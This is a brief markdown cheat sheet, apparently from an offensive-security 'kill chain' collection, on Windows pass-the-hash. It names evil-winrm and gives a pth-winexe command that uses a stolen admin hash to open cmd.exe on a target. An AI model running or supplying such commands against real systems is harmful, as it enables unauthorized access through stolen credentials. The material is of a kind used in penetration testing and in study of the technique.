killchain-compendium/exploit/windows/docs/pass_the_hash.md

130 B

Pass the Hash

  • Authenticate with retrieved hash
  • User evil-winrm or
pth-winexe -U 'admin%hash' //<target-IP> cmd.exe